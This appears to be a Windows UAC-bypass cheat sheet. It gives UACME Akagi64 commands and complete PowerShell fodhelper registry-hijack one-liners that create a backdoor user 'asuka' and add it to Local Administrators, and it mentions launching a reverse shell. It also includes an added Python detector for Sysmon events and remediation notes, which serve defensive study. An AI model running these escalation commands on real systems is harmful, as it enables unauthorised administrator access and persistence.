UAC Bypass
Common UAC Bypass Checklists
A UAC bypass is a method to circumvent User Account Control, a security feature in Windows that asks for confirmation before making major changes. Bypasses typically trick trusted programs into running malicious code with high privileges.
UACME
# Add new user
Akagi64.exe 61 "net user asuka asuk@1337 /add"
# Reverse shell
Akagi64.exe 61 "E:\Exploits\shell.exe"
Fodhelper
fodhelper.exe is an auto-elevating Windows binary that resolves the ms-settings handler from the per-user HKCU hive, so the registry key written below is both what the bypass relies on and what a defender should monitor and remove.
Run in PowerShell.
Add New Administrator
# Add user "asuka"
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net user asuka asuk@1337 /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"
# Add asuka to Local Administrator
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net localgroup Administrators asuka /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"
# Delete registry value
reg delete HKCU\Software\Classes\ms-settings\ /f
Reverse shell
reverse-shell.ps1
Convert it to Base64 using UTF-16LE character encoding.
Final Fodhelper payload:
Delete registry value after command executed:
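The fodhelper technique above leaves two observable traces: a write to the ms-settings shell handler under the user's hive (Sysmon RegistryEvent, ID 13) and a High-integrity child process spawned by fodhelper.exe (Sysmon ProcessCreate, ID 1). The detection below is an added example, not code from the original page; it assumes events have been flattened to a constructed `key=value|key=value` line format whose field names mirror Sysmon's, and the sample events are constructed to mimic the commands shown on this page.

```python
"""Detect the fodhelper.exe UAC-bypass pattern in Sysmon-style event lines.

Added example, not part of the original page. The 'k=v|k=v' line format is
a constructed stand-in for a log pipeline's flattened output; field names
follow Sysmon RegistryEvent (EventID 13) and ProcessCreate (EventID 1).
"""
import re
from typing import Dict, List

# Sysmon writes HKCU paths as HKU\<SID>\...; any write under this handler
# by a non-elevated process is the setup step of the bypass.
MS_SETTINGS_HANDLER = re.compile(
    r"^HKU\\[^\\]+\\Software\\Classes\\ms-settings\\shell\\open\\command(\\|$)",
    re.IGNORECASE,
)

# Auto-elevating binaries whose High-integrity children warrant inspection.
AUTO_ELEVATING = {"fodhelper.exe"}


def parse_event(line: str) -> Dict[str, str]:
    """Parse one constructed 'k=v|k=v' line into a field dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def registry_hijack(ev: Dict[str, str]) -> bool:
    """EventID 13: a value set under the per-user ms-settings shell handler."""
    return ev.get("EventID") == "13" and bool(
        MS_SETTINGS_HANDLER.match(ev.get("TargetObject", ""))
    )


def elevated_child_of_autoelevator(ev: Dict[str, str]) -> bool:
    """EventID 1: a High-integrity process whose parent is fodhelper.exe."""
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return (
        ev.get("EventID") == "1"
        and parent in AUTO_ELEVATING
        and ev.get("IntegrityLevel", "") == "High"
    )


def detect(lines: List[str]) -> List[str]:
    """Return one alert string per matching event, in log order."""
    alerts: List[str] = []
    for line in lines:
        ev = parse_event(line)
        if registry_hijack(ev):
            alerts.append(
                f"ms-settings handler written by {ev.get('Image')}: "
                f"{ev.get('TargetObject')} = {ev.get('Details')}"
            )
        if elevated_child_of_autoelevator(ev):
            alerts.append(
                f"fodhelper.exe spawned High-integrity child: "
                f"{ev.get('Image')} [{ev.get('CommandLine')}]"
            )
    return alerts


# Constructed sample events: the first three reproduce the page's
# "add user" bypass, the last two are benign noise that must not alert.
SAMPLE_EVENTS = [
    "EventID=13|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings"
    "\\shell\\open\\command\\DelegateExecute|Details=(Empty)",
    "EventID=13|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\ms-settings"
    "\\shell\\open\\command\\(Default)|Details=net user asuka asuk@1337 /add",
    "EventID=1|Image=C:\\Windows\\System32\\net.exe|CommandLine=net user asuka asuk@1337 /add"
    "|ParentImage=C:\\Windows\\System32\\fodhelper.exe|IntegrityLevel=High",
    "EventID=1|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe"
    "|ParentImage=C:\\Windows\\explorer.exe|IntegrityLevel=Medium",
    "EventID=13|Image=C:\\Windows\\explorer.exe"
    "|TargetObject=HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\txtfile"
    "\\shell\\open\\command\\(Default)|Details=notepad.exe %1",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

On a clean host the `HKCU\Software\Classes\ms-settings` key does not exist at all, so the registry rule needs no allow-list: any write there is worth a ticket, and the `reg delete` step shown above is exactly the remediation. The process rule is deliberately narrow (High-integrity children of fodhelper.exe); broaden `AUTO_ELEVATING` with other auto-elevating binaries your telemetry shows being abused.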
Slui File Handler Hijack LPE